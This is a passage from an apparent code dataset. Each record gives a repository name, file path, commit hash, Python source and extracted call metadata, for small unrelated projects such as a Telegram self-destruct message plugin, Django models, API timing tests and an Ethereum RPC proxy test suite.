'BooleanNode', ({(166, 44, 166, 48): 's[1]'}, {}), '(s[1])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((167, 33, 167, 49), 'src.ast_nodes.StringNode', 'StringNode', ({(167, 44, 167, 48): 's[1]'}, {}), '(s[1])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n')]
Aliensuniquebot/CatUserbot
userbot/plugins/selfdestruct.py
93561a620fc1198c6fe6c259412088f4bc81d97b
# For @UniBorg # courtesy Yasir siddiqui """Self Destruct Plugin .sd <time in seconds> <text> """ import time from userbot import CMD_HELP from telethon.errors import rpcbaseerrors from userbot.utils import admin_cmd import importlib.util @borg.on(admin_cmd(pattern="sdm", outgoing=True)) async def selfdestruct(destroy): if not destroy.text[0].isalpha() and destroy.text[0] not in ("/", "#", "@", "!"): message = destroy.text counter = int(message[5:7]) text = str(destroy.text[7:]) text = ( text ) await destroy.delete() smsg = await destroy.client.send_message(destroy.chat_id, text) time.sleep(counter) await smsg.delete() @borg.on(admin_cmd(pattern="selfd", outgoing=True )) async def selfdestruct(destroy): if not destroy.text[0].isalpha() and destroy.text[0] not in ("/", "#", "@", "!"): message = destroy.text counter = int(message[7:9]) text = str(destroy.text[9:]) text = ( text + "\n\n`This message shall be self-destructed in " + str(counter) + " seconds`" ) await destroy.delete() smsg = await destroy.client.send_message(destroy.chat_id, text) time.sleep(counter) await smsg.delete() CMD_HELP.update({ "selfdestruct": ".sdm number | [text]\ \nUsage: self destruct this message in number seconds \ \n\n.self number | [text]\ \nUsage:self destruct this message in number seconds with showing that it will destruct. \ " })
[((49, 0, 56, 2), 'userbot.CMD_HELP.update', 'CMD_HELP.update', ({(49, 16, 56, 1): '{\'selfdestruct\':\n """.sdm number | [text]\nUsage: self destruct this message in number seconds \n\n.self number | [text]\nUsage:self destruct this message in number seconds with showing that it will destruct. """\n }'}, {}), '({\'selfdestruct\':\n """.sdm number | [text]\nUsage: self destruct this message in number seconds \n\n.self number | [text]\nUsage:self destruct this message in number seconds with showing that it will destruct. """\n })', False, 'from userbot import CMD_HELP\n'), ((16, 9, 16, 48), 'userbot.utils.admin_cmd', 'admin_cmd', (), '', False, 'from userbot.utils import admin_cmd\n'), ((31, 9, 31, 52), 'userbot.utils.admin_cmd', 'admin_cmd', (), '', False, 'from userbot.utils import admin_cmd\n'), ((27, 8, 27, 27), 'time.sleep', 'time.sleep', ({(27, 19, 27, 26): 'counter'}, {}), '(counter)', False, 'import time\n'), ((45, 8, 45, 27), 'time.sleep', 'time.sleep', ({(45, 19, 45, 26): 'counter'}, {}), '(counter)', False, 'import time\n')]
OSAMAMOHAMED1234/python_projects
snippets/basic_render_template_class.py
fb4bc7356847c3f46df690a9386cf970377a6f7c
import os class Template: template_name = '' context = None def __init__(self, template_name='', context=None, *args, **kwargs): self.template_name = template_name self.context = context def get_template(self): template_path = os.path.join(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'templates'), self.template_name) if not os.path.exists(template_path): raise Exception(f'This path does not exist : {template_path}') template_string = '' with open(template_path, 'r') as f: template_string = f.read() return template_string def render(self, context=None): render_ctx = context if self.context != None: render_ctx = self.context if not isinstance(render_ctx, dict): render_ctx = {} template_string = self.get_template() return template_string.format(**render_ctx) obj = Template(template_name='test.html', context={'name': 'OSAMA'}) print(obj.render()) obj.context= None print(obj.render(context={'name': 'os'})) obj2 = Template(template_name='test.html') print(obj2.render(context={'name': 'os'}))
[((12, 11, 12, 40), 'os.path.exists', 'os.path.exists', ({(12, 26, 12, 39): 'template_path'}, {}), '(template_path)', False, 'import os\n'), ((11, 62, 11, 87), 'os.path.abspath', 'os.path.abspath', ({(11, 78, 11, 86): '__file__'}, {}), '(__file__)', False, 'import os\n')]
jameskzhao/python36
level_one/strings.py
855e8a6e164065702efa7773da1f089454fdcbcc
#Basics a = "hello" a += " I'm a dog" print(a) print(len(a)) print(a[1:]) #Output: ello I'm a dog print(a[:5]) #Output: hello(index 5 is not included) print(a[2:5])#Output: llo(index 2 is included) print(a[::2])#Step size #string is immutable so you can't assign a[1]= b x = a.upper() print(x) x = a.capitalize() print(x) x = a.split('e') print(x) x = a.split() #splits the string by space print(x) x = a.strip() #removes any whitespace from beginning or the end print(x) x = a.replace('l','xxx') print(x) x = "Insert another string here: {}".format('insert me!') x = "Item One: {} Item Two: {}".format('dog', 'cat') print(x) x = "Item One: {m} Item Two: {m}".format(m='dog', n='cat') print(x) #command-line string input print("Enter your name:") x = input() print("Hello: {}".format(x))
[]
glushkovvv/test_2gis
tests/test_01_accept_time_get_headers.py
2affff49411a3c7ff77e9d399ec86eb314aa3757
# -*- coding: utf-8 -*- """ test_01_accept_time_get_headers ~~~~~~~~~~~~~~ The 2GIS API Test Check time get headers :author: Vadim Glushkov :copyright: Copyright 2019, The2GIS API Test" :license: MIT :version: 1.0.0 :maintainer: Vadim Glushkov :email: [email protected] :status: Development """ import pytest import allure from tools.api_responses import get_response @allure.epic("Поизитивные тесты API") @allure.suite("Позитивное тестирование время ответов") @allure.title("Проверка время ответа при нечётком поиске, при фильтрации по коду страны, при постраничной разбивке") @pytest.mark.parametrize("json_params", [{"page": 1, "page_size": 5}, {"country_code": "ru", "page": 1, "page_size": 5}, {"q": "ОРСК"}]) def test_01_time_response_for_valid_request(setup_option, json_params): """ Проверяем время ответов сервера при валидных запросах :param setup_option: Установочные параметры :type setup_option: dict :param json_params: Параметры GET запроса :type json_params: dict :return: """ api_url = setup_option['site_url'] request_params = json_params api_response = get_response(api_url, request_params) testing_message = (f" EndPoint: {api_response.url}\n" f" Status: {api_response.status_code}\n" f" Headers: {api_response.headers}\n" f" Content: {api_response.content}") check = api_response.elapsed.total_seconds() <= 0.2 assert check, f"""Время ответа {api_response.elapsed.total_seconds()} больше 0.2 сек\r\n""" + testing_message @allure.epic("Смок тесты API") @allure.suite("Позитивное тестирование время ответов") @allure.title("Проверка время ответа при нечётком поиске, при фильтрации по коду страны, при постраничной разбивке") @pytest.mark.parametrize("json_params", [{"page": 1, "page_size": 2}, {"country_code": "tz", "page": 1, "page_size": 5}, {"q": "ОР"}]) def test_01_time_response_for_invalid_request(setup_option, json_params): """ Проверяем время ответов сервера при невалидных запросах :param setup_option: Установочные параметры :type setup_option: dict :param json_params: Параметры GET запроса :type json_params: dict :return: """ api_url = setup_option['site_url'] request_params = json_params api_response = get_response(api_url, request_params) testing_message = (f" EndPoint: {api_response.url}\n" f" Status: {api_response.status_code}\n" f" Headers: {api_response.headers}\n" f" Content: {api_response.content}") check = api_response.elapsed.total_seconds() <= 0.5 assert check, f"""Время ответа {api_response.elapsed.total_seconds()} больше 0.5 сек\r\n""" + testing_message
[((24, 1, 24, 53), 'allure.epic', 'allure.epic', ({(24, 13, 24, 52): '"""Поизитивные тесты API"""'}, {}), "('Поизитивные тесты API')", False, 'import allure\n'), ((25, 1, 25, 88), 'allure.suite', 'allure.suite', ({(25, 14, 25, 87): '"""Позитивное тестирование время ответов"""'}, {}), "('Позитивное тестирование время ответов')", False, 'import allure\n'), ((26, 1, 26, 200), 'allure.title', 'allure.title', ({(26, 14, 26, 199): '"""Проверка время ответа при нечётком поиске, при фильтрации по коду страны, при постраничной разбивке"""'}, {}), "(\n 'Проверка время ответа при нечётком поиске, при фильтрации по коду страны, при постраничной разбивке'\n )", False, 'import allure\n'), ((27, 1, 29, 60), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(27, 25, 27, 38): '"""json_params"""', (27, 40, 29, 59): "[{'page': 1, 'page_size': 5}, {'country_code': 'ru', 'page': 1, 'page_size':\n 5}, {'q': 'ОРСК'}]"}, {}), "('json_params', [{'page': 1, 'page_size': 5}, {\n 'country_code': 'ru', 'page': 1, 'page_size': 5}, {'q': 'ОРСК'}])", False, 'import pytest\n'), ((51, 1, 51, 39), 'allure.epic', 'allure.epic', ({(51, 13, 51, 38): '"""Смок тесты API"""'}, {}), "('Смок тесты API')", False, 'import allure\n'), ((52, 1, 52, 88), 'allure.suite', 'allure.suite', ({(52, 14, 52, 87): '"""Позитивное тестирование время ответов"""'}, {}), "('Позитивное тестирование время ответов')", False, 'import allure\n'), ((53, 1, 53, 200), 'allure.title', 'allure.title', ({(53, 14, 53, 199): '"""Проверка время ответа при нечётком поиске, при фильтрации по коду страны, при постраничной разбивке"""'}, {}), "(\n 'Проверка время ответа при нечётком поиске, при фильтрации по коду страны, при постраничной разбивке'\n )", False, 'import allure\n'), ((54, 1, 56, 56), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(54, 25, 54, 38): '"""json_params"""', (54, 40, 56, 55): "[{'page': 1, 'page_size': 2}, {'country_code': 'tz', 'page': 1, 'page_size':\n 5}, {'q': 'ОР'}]"}, {}), "('json_params', [{'page': 1, 'page_size': 2}, {\n 'country_code': 'tz', 'page': 1, 'page_size': 5}, {'q': 'ОР'}])", False, 'import pytest\n'), ((42, 19, 42, 56), 'tools.api_responses.get_response', 'get_response', ({(42, 32, 42, 39): 'api_url', (42, 41, 42, 55): 'request_params'}, {}), '(api_url, request_params)', False, 'from tools.api_responses import get_response\n'), ((69, 19, 69, 56), 'tools.api_responses.get_response', 'get_response', ({(69, 32, 69, 39): 'api_url', (69, 41, 69, 55): 'request_params'}, {}), '(api_url, request_params)', False, 'from tools.api_responses import get_response\n')]
ucds-sg/h2oai
transformers/string/strlen_transformer.py
7042860767dc25d1a7d7122103bbd5016d02df53
"""Returns the string length of categorical values""" from h2oaicore.transformer_utils import CustomTransformer import datatable as dt import numpy as np class MyStrLenEncoderTransformer(CustomTransformer): @staticmethod def get_default_properties(): return dict(col_type="any", min_cols=1, max_cols=1, relative_importance=1) def fit_transform(self, X: dt.Frame, y: np.array = None): return self.transform(X) def transform(self, X: dt.Frame): return X.to_pandas().astype(str).iloc[:, 0].str.len()
[]
eerzin/eo-learn
geometry/eolearn/geometry/__init__.py
53c5cc229de13b98b5778aeb1d45950c25bf2f95
""" Subpackage containing EOTasks for geometrical transformations """ from .utilities import ErosionTask, VectorToRaster, RasterToVector from .sampling import PointSamplingTask, PointSampler, PointRasterSampler __version__ = '0.4.2'
[]
felipebarraza6/startup_comedy
api/models/users.py
42b4a4547bffc0d7cf34ace520355d80053bbd9e
"""User Model.""" # Django from django.db import models from django.contrib.auth.models import AbstractUser # Utilities from .utils import ApiModel class User(ApiModel, AbstractUser): email = models.EmailField( 'email', unique = True, ) USERNAME_FIELD = 'email' REQUIRED_FIELDS = ['username', 'first_name', 'last_name'] is_student = models.BooleanField(default=False) class Meta: verbose_name='Usuario' verbose_name_plural='Usuarios' def __str__(self): return self.username def get_short_name(self): return self.username class ProfileUser(ApiModel): user = models.OneToOneField(User, on_delete=models.CASCADE) approved_courses = models.ManyToManyField('api.ResultContest', related_name='user_aproved_courses', blank=True, null=True) tests_performed = models.ManyToManyField('api.ResultTest', related_name='user_result_test', blank=True) class Meta: verbose_name = 'Usuario - Perfil' verbose_name_plural = 'Usuarios - Perfiles' def __str__(self): return str(self.user)
[((13, 12, 16, 5), 'django.db.models.EmailField', 'models.EmailField', (), '', False, 'from django.db import models\n'), ((21, 17, 21, 51), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import models\n'), ((35, 11, 35, 63), 'django.db.models.OneToOneField', 'models.OneToOneField', (), '', False, 'from django.db import models\n'), ((36, 23, 37, 71), 'django.db.models.ManyToManyField', 'models.ManyToManyField', (), '', False, 'from django.db import models\n'), ((38, 22, 39, 56), 'django.db.models.ManyToManyField', 'models.ManyToManyField', (), '', False, 'from django.db import models\n')]
m-bo-one/ethereumd-proxy
tests/test_server.py
1d1eb3905dac4b28a8e23c283214859a13f6e020
from collections import namedtuple import json from asynctest.mock import patch import pytest from ethereumd.server import RPCServer from ethereumd.proxy import EthereumProxy from aioethereum.errors import BadResponseError from .base import BaseTestRunner Request = namedtuple('Request', ['json']) class TestServer(BaseTestRunner): run_with_node = True async def init_server(self, loop): server = RPCServer() with patch('ethereumd.poller.Poller.poll'): await server.before_server_start()(None, loop) return server @pytest.mark.asyncio async def test_server_handler_index_success_call(self, event_loop): server = await self.init_server(event_loop) data = { 'jsonrpc': '2.0', 'method': 'getblockcount', 'params': [], 'id': 'test', } request = Request(json=data) response = await server.handler_index(request) parsed = json.loads(response.body) assert parsed['error'] is None assert isinstance(parsed['result'], int) @pytest.mark.asyncio async def test_server_handler_index_invalid_rpc_data(self, event_loop): server = await self.init_server(event_loop) data = { 'jsonrpc': '2.0', 'method': 'getblockcount', 'id': 'test', } request = Request(json=data) response = await server.handler_index(request) parsed = json.loads(response.body) assert parsed['error']['code'] == -32602 assert parsed['error']['message'] == 'Invalid rpc 2.0 structure' assert parsed['result'] is None @pytest.mark.asyncio async def test_server_handler_index_attr_error_call(self, event_loop): server = await self.init_server(event_loop) data = { 'jsonrpc': '2.0', 'method': 'getblockcount', 'params': [], 'id': 'test', } request = Request(json=data) def _raise_error(): raise AttributeError('bla bla method not found') with patch.object(EthereumProxy, 'getblockcount', side_effect=_raise_error): response = await server.handler_index(request) parsed = json.loads(response.body) assert parsed['error']['code'] == -32601 assert parsed['error']['message'] == 'Method not found' assert parsed['result'] is None @pytest.mark.asyncio async def test_server_handler_index_type_error_call(self, event_loop): server = await self.init_server(event_loop) data = { 'jsonrpc': '2.0', 'method': 'getblockcount', 'params': [], 'id': 'test', } request = Request(json=data) def _raise_error(): raise TypeError('test') with patch.object(EthereumProxy, 'getblockcount', side_effect=_raise_error): response = await server.handler_index(request) parsed = json.loads(response.body) assert parsed['error']['code'] == -1 assert parsed['error']['message'] == 'test' assert parsed['result'] is None @pytest.mark.asyncio async def test_server_handler_index_bad_response_call(self, event_loop): server = await self.init_server(event_loop) data = { 'jsonrpc': '2.0', 'method': 'getblockcount', 'params': [], 'id': 'test', } request = Request(json=data) def _raise_error(): raise BadResponseError('test', code=-99999999) with patch.object(EthereumProxy, 'getblockcount', side_effect=_raise_error): response = await server.handler_index(request) parsed = json.loads(response.body) assert parsed['error']['code'] == -99999999 assert parsed['error']['message'] == 'test' assert parsed['result'] is None
[((14, 10, 14, 41), 'collections.namedtuple', 'namedtuple', ({(14, 21, 14, 30): '"""Request"""', (14, 32, 14, 40): "['json']"}, {}), "('Request', ['json'])", False, 'from collections import namedtuple\n'), ((22, 17, 22, 28), 'ethereumd.server.RPCServer', 'RPCServer', ({}, {}), '()', False, 'from ethereumd.server import RPCServer\n'), ((38, 17, 38, 42), 'json.loads', 'json.loads', ({(38, 28, 38, 41): 'response.body'}, {}), '(response.body)', False, 'import json\n'), ((52, 17, 52, 42), 'json.loads', 'json.loads', ({(52, 28, 52, 41): 'response.body'}, {}), '(response.body)', False, 'import json\n'), ((73, 17, 73, 42), 'json.loads', 'json.loads', ({(73, 28, 73, 41): 'response.body'}, {}), '(response.body)', False, 'import json\n'), ((94, 17, 94, 42), 'json.loads', 'json.loads', ({(94, 28, 94, 41): 'response.body'}, {}), '(response.body)', False, 'import json\n'), ((115, 17, 115, 42), 'json.loads', 'json.loads', ({(115, 28, 115, 41): 'response.body'}, {}), '(response.body)', False, 'import json\n'), ((23, 13, 23, 50), 'asynctest.mock.patch', 'patch', ({(23, 19, 23, 49): '"""ethereumd.poller.Poller.poll"""'}, {}), "('ethereumd.poller.Poller.poll')", False, 'from asynctest.mock import patch\n'), ((70, 13, 71, 51), 'asynctest.mock.patch.object', 'patch.object', (), '', False, 'from asynctest.mock import patch\n'), ((91, 13, 92, 51), 'asynctest.mock.patch.object', 'patch.object', (), '', False, 'from asynctest.mock import patch\n'), ((111, 18, 111, 58), 'aioethereum.errors.BadResponseError', 'BadResponseError', (), '', False, 'from aioethereum.errors import BadResponseError\n'), ((112, 13, 113, 51), 'asynctest.mock.patch.object', 'patch.object', (), '', False, 'from asynctest.mock import patch\n')]
evdcush/neorl
neorl/rl/baselines/readme.py
a1af069072e752ab79e7279a88ad95d195a81821
# This file is part of NEORL. # Copyright (c) 2021 Exelon Corporation and MIT Nuclear Science and Engineering # NEORL is free software: you can redistribute it and/or modify # it under the terms of the MIT LICENSE # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. #NEORL team thanks stable-baselines as we have used their own implementation of different RL #algorathims to establish NEORL optimizers. We have used the files in this open-source repo: #https://github.com/hill-a/stable-baselines
[]
sushantPatrikar/WaveCompartor
Compare.py
112395287b41c1b5533924ebe293c5641647a5e3
from scipy.io import wavfile import numpy as np import pingouin as pg import pandas as pd _,data = wavfile.read('wav//ed//mp3baked.wav') _,data1 = wavfile.read('wav//ing//ingeating.wav') i= data.shape[0]-1 j = data1.shape[0]-1 index_1 = -1 index_2 = -1 try: data.shape[1] except IndexError: data = data.reshape(data.shape[0],1) try: data1.shape[1] except IndexError: data1 = data1.reshape(data1.shape[0],1) while True: if data[i,0] !=0 and index_1==-1: index_1 = i pass if data1[j,0] !=0 and index_2==-1: index_2 = j pass if index_1!=-1 and index_2!=-1: break i-=1 j-=1 data = data[-index_1:,:] data1 = data1[-index_2:,:] data = data[-2000:,:] data1= data1[-2000:,:] x =pg.corr(x=data[:,0],y=data1[:,0]) print(x) # print(data.tostring()) # print(data1.tostring()) # data = data[:,:] # data1 = data1[:,:] # data = data.reshape(data.shape[0],1) # data1 = data1.reshape(data1.shape[0],1) # data = data[-10000:,:] # data1 = data1[-10000:,:] # print(data1.shape[1]) # df = pd.DataFrame(data,data1) # print(df.head()) # print(data1.shape) # data = data[-5000:,:] # data1 = data1[-5000:,:] # # # x =pg.corr(x=data[:,0],y=data1[:,0]) # print(x)
[((6, 9, 6, 46), 'scipy.io.wavfile.read', 'wavfile.read', ({(6, 22, 6, 45): '"""wav//ed//mp3baked.wav"""'}, {}), "('wav//ed//mp3baked.wav')", False, 'from scipy.io import wavfile\n'), ((7, 10, 7, 49), 'scipy.io.wavfile.read', 'wavfile.read', ({(7, 23, 7, 48): '"""wav//ing//ingeating.wav"""'}, {}), "('wav//ing//ingeating.wav')", False, 'from scipy.io import wavfile\n'), ((44, 3, 44, 36), 'pingouin.corr', 'pg.corr', (), '', True, 'import pingouin as pg\n')]
sco1/pylox
tests/comments/test_only_block_comment.py
b4820828306c20cee3f8533c2547fafb92c6c1bd
from textwrap import dedent import pytest from pylox.lox import Lox TEST_SRC = dedent( """\ /* This is a multiline block comment */ """ ) EXPECTED_STDOUTS: list[str] = [] def test_block_comment_at_eof(capsys: pytest.CaptureFixture) -> None: interpreter = Lox() interpreter.run(TEST_SRC) assert not interpreter.had_error assert not interpreter.had_runtime_error all_out = capsys.readouterr().out.splitlines() assert all_out == EXPECTED_STDOUTS
[((7, 11, 13, 1), 'textwrap.dedent', 'dedent', ({(8, 4, 12, 7): '""" /*\n This is a multiline block comment\n */\n """'}, {}), '(""" /*\n This is a multiline block comment\n */\n """)', False, 'from textwrap import dedent\n'), ((19, 18, 19, 23), 'pylox.lox.Lox', 'Lox', ({}, {}), '()', False, 'from pylox.lox import Lox\n')]
n-kats/mlbase
mlbase/lazy.py
7d69f259dcaf9608a921523083458fa6d0d6914b
from mlbase.utils.misc import lazy tensorflow = lazy("tensorflow") numpy = lazy("numpy") gensim = lazy("gensim")
[((3, 13, 3, 31), 'mlbase.utils.misc.lazy', 'lazy', ({(3, 18, 3, 30): '"""tensorflow"""'}, {}), "('tensorflow')", False, 'from mlbase.utils.misc import lazy\n'), ((4, 8, 4, 21), 'mlbase.utils.misc.lazy', 'lazy', ({(4, 13, 4, 20): '"""numpy"""'}, {}), "('numpy')", False, 'from mlbase.utils.misc import lazy\n'), ((5, 9, 5, 23), 'mlbase.utils.misc.lazy', 'lazy', ({(5, 14, 5, 22): '"""gensim"""'}, {}), "('gensim')", False, 'from mlbase.utils.misc import lazy\n')]
sturmianseq/observed
setup.py
d99fb99ff2a470a86efb2763685e8e2c021e799f
import re import setuptools README_FILENAME = "README.md" VERSION_FILENAME = "observed.py" VERSION_RE = r"^__version__ = ['\"]([^'\"]*)['\"]" # Get version information with open(VERSION_FILENAME, "r") as version_file: mo = re.search(VERSION_RE, version_file.read(), re.M) if mo: version = mo.group(1) else: msg = "Unable to find version string in %s." % (version_file,) raise RuntimeError(msg) # Get description information with open(README_FILENAME, "r") as description_file: long_description = description_file.read() setuptools.setup( name="observed", version=version, author="Daniel Sank", author_email="[email protected]", description="Observer pattern for functions and bound methods", long_description=long_description, long_description_content_type="text/markdown", url="https://github.com/DanielSank/observed", py_modules=["observed"], classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", ], )
[((24, 0, 39, 1), 'setuptools.setup', 'setuptools.setup', (), '', False, 'import setuptools\n')]
catalyst-team/detector
src/coco.py
383c17ba7701d960ca92be0aafbff05207f2de3a
import os import json import numpy as np import pickle from typing import Any from pycocotools.coco import COCO from torch.utils.data import Dataset class DetectionMSCOCODataset(Dataset): def __init__(self, annotation_file: str, image_dir: str): self._annotation_file = annotation_file self._image_dir = image_dir self._cache_file = self._annotation_file + ".cache" self._coco = COCO(self._annotation_file) self._img_ids = self._coco.getImgIds() self._cat_ids = self._coco.getCatIds() self._ann_ids = self._coco.getAnnIds() self._data = "coco" self._classes = { ind: cat_id for ind, cat_id in enumerate(self._cat_ids) } self._coco_to_class_map = { value: key for key, value in self._classes.items() } self._load_data() self._db_inds = np.arange(len(self._image_names)) self._load_coco_data() def _load_data(self): print("loading from cache file: {}".format(self._cache_file)) if not os.path.exists(self._cache_file): print("No cache file found...") self._extract_data() with open(self._cache_file, "wb") as f: pickle.dump([self._detections, self._image_names], f) print("Cache file created") else: with open(self._cache_file, "rb") as f: self._detections, self._image_names = pickle.load(f) def _load_coco_data(self): with open(self._annotation_file, "r") as f: data = json.load(f) coco_ids = self._coco.getImgIds() eval_ids = { self._coco.loadImgs(coco_id)[0]["file_name"]: coco_id for coco_id in coco_ids } self._coco_categories = data["categories"] self._coco_eval_ids = eval_ids def class_name(self, cid): cat_id = self._classes[cid] cat = self._coco.loadCats([cat_id])[0] return cat["name"] def _extract_data(self): self._image_names = [ self._coco.loadImgs(img_id)[0]["file_name"] for img_id in self._img_ids ] self._detections = {} for ind, (coco_image_id, image_name) in enumerate(zip(self._img_ids, self._image_names)): image = self._coco.loadImgs(coco_image_id)[0] bboxes = [] categories = [] for cat_id in self._cat_ids: annotation_ids = self._coco.getAnnIds(imgIds=image["id"], catIds=cat_id) annotations = self._coco.loadAnns(annotation_ids) category = self._coco_to_class_map[cat_id] for annotation in annotations: bbox = np.array(annotation["bbox"]) bbox[[2, 3]] += bbox[[0, 1]] bboxes.append(bbox) categories.append(category) self._detections[image_name] = [{ 'bbox': bbox.astype(np.float32), 'category_id': category, 'category_name': self.class_name(category) } for bbox, category in zip(bboxes, categories)] def __getitem__(self, ind: int) -> Any: image_name = self._image_names[ind] return { 'image_name': os.path.join(self._image_dir, image_name), 'detections': self._detections[image_name] } def __len__(self) -> int: return len(self._img_ids) def get_num_classes(self) -> int: return len(self._cat_ids)
[((18, 21, 18, 48), 'pycocotools.coco.COCO', 'COCO', ({(18, 26, 18, 47): 'self._annotation_file'}, {}), '(self._annotation_file)', False, 'from pycocotools.coco import COCO\n'), ((39, 15, 39, 47), 'os.path.exists', 'os.path.exists', ({(39, 30, 39, 46): 'self._cache_file'}, {}), '(self._cache_file)', False, 'import os\n'), ((51, 19, 51, 31), 'json.load', 'json.load', ({(51, 29, 51, 30): 'f'}, {}), '(f)', False, 'import json\n'), ((100, 26, 100, 67), 'os.path.join', 'os.path.join', ({(100, 39, 100, 54): 'self._image_dir', (100, 56, 100, 66): 'image_name'}, {}), '(self._image_dir, image_name)', False, 'import os\n'), ((43, 16, 43, 69), 'pickle.dump', 'pickle.dump', ({(43, 28, 43, 65): '[self._detections, self._image_names]', (43, 67, 43, 68): 'f'}, {}), '([self._detections, self._image_names], f)', False, 'import pickle\n'), ((47, 54, 47, 68), 'pickle.load', 'pickle.load', ({(47, 66, 47, 67): 'f'}, {}), '(f)', False, 'import pickle\n'), ((84, 27, 84, 55), 'numpy.array', 'np.array', ({(84, 36, 84, 54): "annotation['bbox']"}, {}), "(annotation['bbox'])", True, 'import numpy as np\n')]
tadvi/uva
UVa 10105 polynomial coefficients/sample/main.py
0ac0cbdf593879b4fb02a3efc09adbb031cb47d5
import sys import operator sys.stdin = open('input.txt') fact = [1, 1] for i in range(2, 15): fact.append(fact[-1] * i) while True: try: n, k = map(int, raw_input().split()) coef = map(int, raw_input().split()) except: break print fact[n] / reduce(operator.mul, [fact[c] for c in coef])
[]
wallaceleonel/Flash-Cards
pynotes/note/models.py
fd563455d437f77e42ddf96133214cf752b62bb6
from django.contrib.auth.models import User from django.db import models from django.urls import reverse # Create your models here. class Post(models.Model): title = models.CharField(max_length=255) slug = models.SlugField(max_length=255,unique=True) #meusite.com/blog;introducao-ao-django author = models.ForeignKey(User, on_delete=models.CASCADE) body = models.TextField() created = models.DateTimeField(auto_now_add=True) updated = models.DateTimeField(auto_now=True) class Meta: ordering = ("-created",) def __str__(self): return self.title def get_absolute_url(self): return reverse("note:detail", kwargs={"slug": self.slug})
[((9, 12, 9, 44), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((10, 11, 10, 55), 'django.db.models.SlugField', 'models.SlugField', (), '', False, 'from django.db import models\n'), ((12, 13, 12, 62), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import models\n'), ((13, 11, 13, 29), 'django.db.models.TextField', 'models.TextField', ({}, {}), '()', False, 'from django.db import models\n'), ((14, 14, 14, 53), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n'), ((15, 14, 15, 49), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n'), ((25, 15, 25, 65), 'django.urls.reverse', 'reverse', (), '', False, 'from django.urls import reverse\n')]
DmytroLiaskovskyi/incubator-dlab
infrastructure-provisioning/src/general/scripts/azure/common_notebook_configure_dataengine.py
af995e98b3b3cf526fb9741a3e5117dd1e04f3aa
#!/usr/bin/python # ***************************************************************************** # # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # # ****************************************************************************** import logging import json import sys from dlab.fab import * from dlab.meta_lib import * from dlab.actions_lib import * import os import uuid if __name__ == "__main__": local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['project_name'], os.environ['request_id']) local_log_filepath = "/logs/" + os.environ['conf_resource'] + "/" + local_log_filename logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s', level=logging.DEBUG, filename=local_log_filepath) try: # generating variables dictionary print('Generating infrastructure names and tags') notebook_config = dict() try: notebook_config['exploratory_name'] = os.environ['exploratory_name'].replace('_', '-') except: notebook_config['exploratory_name'] = '' try: notebook_config['computational_name'] = os.environ['computational_name'].replace('_', '-') except: notebook_config['computational_name'] = '' notebook_config['service_base_name'] = os.environ['conf_service_base_name'] notebook_config['resource_group_name'] = os.environ['azure_resource_group_name'] notebook_config['region'] = os.environ['azure_region'] notebook_config['user_name'] = os.environ['edge_user_name'].replace('_', '-') notebook_config['project_name'] = os.environ['project_name'].replace('_', '-') notebook_config['project_tag'] = os.environ['project_name'].replace('_', '-') notebook_config['endpoint_tag'] = os.environ['endpoint_name'].replace('_', '-') notebook_config['cluster_name'] = notebook_config['service_base_name'] + '-' + notebook_config['project_name'] + \ '-de-' + notebook_config['exploratory_name'] + '-' + \ notebook_config['computational_name'] notebook_config['master_node_name'] = notebook_config['cluster_name'] + '-m' notebook_config['slave_node_name'] = notebook_config['cluster_name'] + '-s' notebook_config['notebook_name'] = os.environ['notebook_instance_name'] notebook_config['key_path'] = os.environ['conf_key_dir'] + '/' + os.environ['conf_key_name'] + '.pem' notebook_config['dlab_ssh_user'] = os.environ['conf_os_user'] notebook_config['instance_count'] = int(os.environ['dataengine_instance_count']) try: notebook_config['spark_master_ip'] = AzureMeta().get_private_ip_address( notebook_config['resource_group_name'], notebook_config['master_node_name']) notebook_config['notebook_ip'] = AzureMeta().get_private_ip_address( notebook_config['resource_group_name'], notebook_config['notebook_name']) except Exception as err: print('Error: 